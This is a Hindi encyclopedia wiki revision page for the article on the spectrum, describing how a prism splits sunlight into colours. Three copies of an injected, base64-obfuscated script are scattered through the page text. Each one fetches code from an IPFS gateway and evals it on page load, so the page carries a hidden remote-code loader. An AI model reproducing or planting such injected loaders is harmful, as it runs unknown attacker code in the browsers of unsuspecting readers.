Difference between revisions of "वर्णक्रम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[चित्र:Prism.png|thumb|right|वर्णक्रम <br/ >Prism]]
+
[[चित्र:Prism.png|thumb|right|वर्णक्रम <br/ >Spectrum]]
*जब [[सूर्य ग्रह|सूर्य]] का प्रकाश प्रिज्म से होकर गुजरता है, तो वह अपवर्तन के पश्चात् प्रिज्म के आधार की ओर झुकने के साथ-साथ विभिन्न [[रंग|रंगों]] के प्रकाश में बँट जाता है। इस प्रकार से प्राप्त रंगों के समूह को वर्णक्रम कहते हैं।
+
*जब [[सूर्य ग्रह|सूर्य]] का [[प्रकाश]] प्रिज़्म से होकर गुजरता है, तो वह अपवर्तन के पश्चात् प्रिज़्म के आधार की ओर झुकने के साथ-साथ विभिन्न [[रंग|रंगों]] के प्रकाश में बँट जाता है। इस प्रकार से प्राप्त रंगों के समूह को वर्णक्रम कहते हैं।
*अंग्रेज़ी भाषा में इसे स्पैक्ट्रम (Spectrum) कहा जाता है।
+
*[[अंग्रेज़ी भाषा]] में इसे स्पैक्ट्रम (Spectrum) कहा जाता है।
 
*इसे नापने में मेगाहर्ट्ज का प्रयोग किया जाता है।  
 
*इसे नापने में मेगाहर्ट्ज का प्रयोग किया जाता है।  
 
*वर्णक्रम की [[आवृति|आवृत्तियों]] की दूरी एक मानक द्वारा तय की जाती है।  
 
*वर्णक्रम की [[आवृति|आवृत्तियों]] की दूरी एक मानक द्वारा तय की जाती है।  
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 13: Line 12:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{भौतिक विज्ञान}}
 
[[Category:भौतिक विज्ञान]]
 
[[Category:भौतिक विज्ञान]]
 
[[Category:प्रकाश]]  
 
[[Category:प्रकाश]]  
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:43, 4 October 2011

thumb|right|varnakram
Spectrum

  • jab soory ka prakash prizm se hokar gujarata hai, to vah apavartan ke pashchath prizm ke adhar ki or jhukane ke sath-sath vibhinn rangoan ke prakash mean bant jata hai. is prakar se prapt rangoan ke samooh ko varnakram kahate haian.
  • aangrezi bhasha mean ise spaiktram (Spectrum) kaha jata hai.
  • ise napane mean megahartj ka prayog kiya jata hai.
  • varnakram ki avrittiyoan ki doori ek manak dvara tay ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>